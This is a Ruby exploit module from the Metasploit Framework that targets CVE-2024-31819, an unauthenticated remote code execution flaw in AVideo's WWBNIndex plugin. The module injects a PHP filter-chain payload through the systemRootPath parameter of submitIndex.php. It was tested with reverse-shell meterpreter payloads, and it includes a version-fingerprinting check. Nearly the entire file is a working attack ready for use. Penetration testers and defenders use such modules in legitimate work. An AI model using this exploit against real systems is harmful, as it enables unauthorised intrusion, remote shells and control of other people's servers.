GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
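class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # Provides generate_php_filter_payload: wraps arbitrary PHP in a php://filter
  # chain so that require() of the resulting "path" executes it without any file
  # needing to exist on disk.
  include Msf::Exploit::Remote::HTTP::PhpFilterChain
  # Runs #check before #exploit unless the operator disables AutoCheck.
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AVideo WWBNIndex Plugin Unauthenticated RCE',
        'Description' => %q{
          This module exploits an unauthenticated remote code execution (RCE) vulnerability
          in the WWBNIndex plugin of the AVideo platform. The vulnerability exists within the
          `submitIndex.php` file, where user-supplied input is passed directly to the `require()`
          function without proper sanitization. By exploiting this, an attacker can leverage the
          PHP filter chaining technique to execute arbitrary PHP code on the server. This allows
          for the execution of commands and control over the affected system. The exploit is
          particularly dangerous because it does not require authentication, making it possible
          for any remote attacker to exploit this vulnerability.
        },
        'Author' => [
          'Valentin Lobstein'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-31819'],
          ['URL', 'https://github.com/WWBN/AVideo'],
          ['URL', 'https://chocapikk.com/posts/2024/cve-2024-31819']
        ],
        'Platform' => ['php', 'unix', 'linux', 'win'],
        'Arch' => [ARCH_PHP, ARCH_CMD],
        'Targets' => [
          [
            'PHP In-Memory',
            {
              'Platform' => 'php',
              'Arch' => ARCH_PHP
              # tested with php/meterpreter/reverse_tcp
            }
          ],
          [
            'Unix In-Memory',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD
              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
            }
          ],
          [
            'Windows In-Memory',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD
              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2024-04-09',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # The POST to submitIndex.php lands in the web server access log; the
          # ARCH_CMD targets were tested with fetch payloads, which stage a file
          # under FETCH_WRITABLE_DIR.
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        },
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 443,
          # Only meaningful for fetch-style ARCH_CMD payloads; the Windows target
          # will normally need this overridden to a path that exists there.
          'FETCH_WRITABLE_DIR' => '/tmp'
        }
      )
    )
  end

  # Builds the PHP stub, wraps it in a php://filter chain and POSTs it as the
  # `systemRootPath` parameter of plugin/WWBNIndex/submitIndex.php.
  #
  # For the ARCH_PHP target the encoded payload is embedded directly; for the
  # ARCH_CMD targets the command is base64-encoded and run through system() so
  # that shell metacharacters never appear inside the PHP source.
  #
  # A successful run keeps the PHP process busy with the payload, so no HTTP
  # response is expected; any response that does come back is reported as an
  # error because it indicates the payload did not execute.
  def exploit
    php_stub =
      if target['Arch'] == ARCH_PHP
        payload.encoded
      else
        "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"
      end
    php_code = "<?php #{php_stub} ?>"
    filter_payload = generate_php_filter_payload(php_code)

    # The filter chain is sent raw in the body rather than through vars_post;
    # the chain is built from filter names and "resource=" only, so it needs no
    # additional form encoding beyond what the mixin already produced.
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),
      'ctype' => 'application/x-www-form-urlencoded',
      'data' => "systemRootPath=#{filter_payload}"
    )
    print_error("Server returned #{res.code}. Successful exploit attempts should not return a response.") if res&.code
  end

  # Fingerprints the target without triggering the vulnerability.
  #
  # 1. Fetches index.php and extracts the AVideo version from either the
  #    "Powered by AVideo ® Platform vX.Y" footer or a "v:X.Y" HTML comment.
  # 2. Requests plugin/WWBNIndex/submitIndex.php with GET; anything other than
  #    HTTP 200 is treated as the plugin being absent and the host is reported
  #    Safe. (Previously this result was computed but never returned, so the
  #    plugin check had no effect on the verdict.)
  # 3. Versions 12.4 through 14.2 inclusive are reported as Appears; anything
  #    else as Safe.
  #
  # @return [Msf::Exploit::CheckCode] Unknown on connection/parsing failure,
  #   Safe when the plugin is missing or the version is out of range,
  #   Appears otherwise. A 200 on submitIndex.php shows the file is reachable,
  #   not that the vulnerable code path is necessarily enabled, hence Appears
  #   rather than Vulnerable.
  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'method' => 'GET',
      'follow_redirect' => true
    })
    return CheckCode::Unknown('Failed to connect to the target.') unless res
    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200

    # /m makes "." span newlines so a multi-line HTML comment still matches.
    version_match = res.body.match(/Powered by AVideo ® Platform v([\d.]+)/) || res.body.match(/<!--.*?v:([\d.]+).*?-->/m)
    return CheckCode::Unknown('Unable to extract AVideo version.') unless version_match && version_match[1]

    version = Rex::Version.new(version_match[1])
    plugin_check = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),
      'method' => 'GET'
    })
    # Bug fix: the Safe verdict must actually be returned, otherwise a host
    # without the plugin still falls through to the version range below.
    return CheckCode::Safe('Vulnerable plugin WWBNIndex was not detected') unless plugin_check&.code == 200

    if version.between?(Rex::Version.new('12.4'), Rex::Version.new('14.2'))
      return CheckCode::Appears("Detected vulnerable AVideo version: #{version}, with vulnerable plugin WWBNIndex running.")
    end

    CheckCode::Safe("Detected non-vulnerable AVideo version: #{version}")
  end
end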